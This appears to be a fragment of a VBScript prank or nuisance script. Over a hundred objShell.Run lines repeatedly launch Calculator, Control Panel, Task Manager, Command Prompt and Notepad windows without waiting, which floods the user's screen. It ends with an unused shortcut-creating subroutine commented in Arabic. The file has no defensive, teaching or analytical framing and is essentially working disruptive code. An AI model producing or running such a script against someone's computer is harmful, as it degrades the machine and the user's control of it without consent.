objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


' 




Sub CreateShortcut(targetPath, shortcutPath)
    ' إنشاء كائن لإنشاء اختصار
    Set objShortcut = objShell.CreateShortcut(shortcutPath)

    ' تعيين مسار الهدف للاختصار
    objShortcut.TargetPath = targetPath

    ' حفظ الاختصار
    objShortcut.Save
End Sub
